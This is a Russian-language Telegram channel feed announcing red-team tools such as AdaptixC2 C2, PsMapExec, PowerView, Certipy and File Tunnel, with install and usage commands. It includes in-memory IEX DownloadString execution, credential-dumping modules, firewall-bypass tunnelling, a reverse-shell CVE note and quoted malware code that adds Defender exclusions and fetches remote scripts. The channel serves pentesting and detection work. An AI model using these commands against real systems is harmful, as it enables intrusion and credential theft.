Whitehat Lab
2.16K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🦎 Срыв покровов 😅

Silent Push раскрывает связи AdaptixC2 с российским преступным миром и отслеживает злоумышленников, использующих данный инструмент


Ребята целое расследование провели и нашли канал Ральфа 😂👍

🔗 Silent Push
💻 AdaptixC2

#adaptix #c2 #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😁16🔥1
🔄🐍 PowerView v2025.1.8

Python реализация известного PowerView.ps1 скрипта
Отличный инструмент при пост эксплуатации 💻 Active Directory
Огромное количество возможностей и настроек, умеет в relay
Работает быстро и стабильно
Различные варианты аутентификации: pfx, kerberos, pth
Из последних фишек, поддержка веб интерфейса
Рекомендую! 🎩

Установка в uv:

uv tool install --python 3.12 git+https://github.com/aniqfakhrul/powerview.py --force


Использование:

powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192

#with web
powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192 --web


Некоторые примеры:

Add-ADComputer
Add-ADUser
ConvertFrom-SID
Get-Domain
Get-DomainCA
Get-DomainRBCD
Get-DomainTrust
Get-NetLoggedOn
Invoke-Kerberoast
Invoke-PrinterBug
Set-CATemplate
Set-DomainRBCD


💻 Home
📔 Wiki

#powerview #redteam #activedirectory #soft

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from BugXplorer (j b)
Bug Bounty Reading List: A curated collection of articles and resources for bug bounty hunters.

https://bb.vitorfalcao.com/
🔥1
🤖 Android Pentest

На арабском, но зато с картинками 😅👍

🔗 More
🔗 OWASP Mobile Top 10

#android #pentest #mobile #frida

✈️ Whitehat Lab 💬 Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁1
🦎🔄 AdaptixC2 v0.10

Вышел релиз лучшего open-source C2 ❤️

Обзоры


UPD 0.10:

Изменения

⭐️Возможности:

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal


⚙️Установка/Запуск 💻:

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh

./adaptixserver -profile profile.json
./AdaptixClient


💻 Rep
💻 Extension-Kit
📔 Docs
✈️ Group

#adaptixc2 #redteam #soft

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥114👍3
Forwarded from 1N73LL1G3NC3
CVE-2025-58034: Fortinet FortiWeb OS Command Injection

As a logged in administrator, we can successfully trigger the authenticated command injection vulnerability and execute a netcat reverse shell with root priviledges.

Affected versions:
FortiWeb 8.0.0 through 8.0.1,
FortiWeb 7.6.0 through 7.6.5,
FortiWeb 7.4.0 through 7.4.10,
FortiWeb 7.2.0 through 7.2.11,
FortiWeb 7.0.0 through 7.0.11

P.S. The auth bypass vulnerability (CVE-2025-64446) can be used to create a new local administrator account, making chaining CVE-2025-64446 + CVE-2025-58034 equivalent to unauthenticated RCE.
👍5😁32
🐧 Red-Team Linux kernel rootkit

KoviD is an open-source Loadable Kernel Module (LKM) security research tool
designed to help security professionals understand and defend against rootkit
techniques in Linux Kernel version 5 and later


💻 Repo

#rootkit #linux #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
31
🔄💻ApacheTomcatScanner v3.8.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Repo

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍1
🔒 Certipy 5.0.4

Certipy is a powerful offensive and defensive toolkit for enumerating and abusing Active Directory Certificate Services (AD CS). It helps red teamers, penetration testers, and defenders assess AD CS misconfigurations - including full support for identifying and exploiting all known ESC1-ESC16 attack paths


Подъехало обновление известного инструмента
Из интересного - полная поддержка impacket 0.13.0 и флаг -debug для любой команды

💻 Repo
📔 Wiki

#windows #ad #redteam #certipy #soft #adcs

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🦀 Malchela v3.0.2

A YARA & Malware Analysis Toolkit написанный на 🖼️ Rust
Работает в GUI или CLI режиме

💻 Repo

#soft #rust #malchela #yara

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🔄 😀 CATS v13.4.3 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k


Запуск в режиме context mode:

cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml


Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10


💻 Repo
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer #web

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🔄 💻 PsMapExec v0.9.2

Вышло большое обновление отличного инструмента пост эксплуатации в 💻 Active Directory, написанного на PowerShell.

UPD. 0.9.2

Дополнительные модули в LDAP:

GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs


Текущая поддержка методов (протоколов)
:

🔵RDP
🔵SessionHunter
🔵SMB
🔵SMB Signing
🔵LDAP / LDAPS
🔵SSH
🔵Spraying
🔵VNC
🔵WinRM
🔵WMI
🔵MSSQL
🔵Kerberoast


Реализованные модули:

🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов
🔵 ConsoleHistory - история в PowerShell
🔵 Files - файлы в типичных директориях
🔵 KerbDump - дамп Kerberos билетов
🔵 eKeys - дамп ключей (Mimikatz)
🔵 LogonPasswords - дамп logon passwords (Mimikatz)
🔵 LSA - дамп LSA (Mimikatz)
🔵 NTDS - реализация DCsync
🔵 SAM - дамп SAM


Запуск из памяти:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")


Примеры:

# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]


💻 Repo
📔 Documentation

#soft #pentest #powershell #psmapexec #redteam #windows

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
Forwarded from RedTeam brazzers (Миша)
Друзья, всем привет!

У меня есть чудесные новости! Совместно с журналом «Хакер» была выпущена моя первая книга «Windows глазами хакера»!

На этой неделе хотел держать информацию в тайне, но, к сожалению, не получилось 😁😁

Если вы желаете оформить заказ уже сейчас, то обратитесь на сайт BHV:
https://bhv.ru/product/windows-glazami-hakera/

Мы также организуем конкурс с призовым фондом в пять книжек среди подписчиков !:) Конкурс начнем лишь после получения мной авторских экземпляров))

Вы также можете попытать удачу в дружественном телеграм-канале, который уже запустил аналогичный розыгрыш! https://t.iss.one/it_secur/3842
🔥15👍1
🔄💻 File Tunnel v3.0.1

TCP туннель через файл

Supported File Systems:

Bypassing a firewal
l:

# Host A
ft.exe -L 5000:127.0.0.1:3389 --write "\\server\share\1.dat" --read "\\server\share\2.dat"

# Host B
ft.exe --read "\\server\share\1.dat" --write "\\server\share\2.dat"


Tunnel TCP through RDP:

# Host A
ft.exe -L 5000:192.168.1.50:8888 --write "C:\Temp\1.dat" --read "C:\Temp\2.dat"

# Host B
ft.exe --read "\\tsclient\c\Temp\1.dat" --write "\\tsclient\c\Temp\2.dat"


💻 Repo

#windows #filetunnel

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from Detection is easy
Всем привет! 💻✌️

Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании

👨‍💻 Посмотрим TTP:

🔤Атака начинается с ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exe

🔤Приложение hta запускает powershell.exe с командлетами iex (irm https://example.com/asf)

🔤Теперь самое интересное. Скачанный ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender


$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'


🔤Для повышения привилегий атакующие запускают powershell.exe с аргументом -Verb RunAs


$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
-Verb RunAs `
-PassThru


И, судя по отчёту, этот функционал запускается в цикле до тех пор, пока пользователь не согласится выдать привилегии

🔤Последним этапом идёт установка RAT или стилера

🔭 Обнаружение:

🔤 отслеживаем аргументы powershell Add-MpPreference, Set-MpPreference, -Exclusion*

🔤 отслеживаем создание новых значений в ключах реестра HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\

🔤 отслеживаем события
ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
🦎🔄 AdaptixC2 v0.11

Вышел релиз лучшего open-source C2 ❤️

Обзоры


UPD 0.11:

Изменения

Переход на Go 1.25.x
Добавлены крутые BOF'ы

⭐️Возможности:

Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal


⚙️Установка/Запуск 💻:

sudo apt install mingw-w64 make gcc g++ g++-mingw-w64

wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

# for windows 7 support by gopher agent
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/

sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-base-private-dev libxkbcommon-dev qt6-websockets-dev qt6-declarative-dev

make server-ext
make client


💻 Rep
💻 Extension-Kit
📔 Docs
✈️ Group

#adaptixc2 #redteam #soft

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😎3👍21
💻 Windows Post-Exploitation Without Tools

Пост эксплуатация Windows без использования сторонних инструментов, в основном там 💻 PowerShell, WMI и стандартные инструменты ОС, рекомендую ⭐️

Understanding Living Off the Land

The term comes from the military concept of living off the land during operations - using local resources instead of bringing your own supplies. In cybersecurity, it refers to using built-in system tools and legitimate executables for malicious purposes. These binaries are often called LOLBins (Living Off the Land Binaries) or LOLBAs (Living Off the Land Binaries and Scripts


🔗 Research (eng.)

#redteam #windows #lolbins #powershell #wmi

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
🔄🔎 Setezor v1.0.8

Инструмент для анализа и проектирования сетевой инфраструктуры. Будет полезен пентестерам, сетевым инженерам, системным администраторам.

UPD

Возможности:

Работа с веб-интерфейсом
Табличное представление данных
Экспорт данных
Скриншот веб-ресурса
Поиск ПО по узлам сети
Сканирование с использованием nmap, masscan и scapy
Парсинг pcap-файлов
Интеграция с search-vulns
Формирование отчёта по найденным уязвимостям
Поиск по SNMP
Построение карты сети
Поиск субдоменов через DNS
HTTP REST API


Установка и запуск:

sudo apt install ./setezor_<ver>.deb

# Переменные окружения
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef

# Сервер
setezor

# Агент
setezor -s -p <port>


💻 Home
💻 Download

#setezor #network

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
2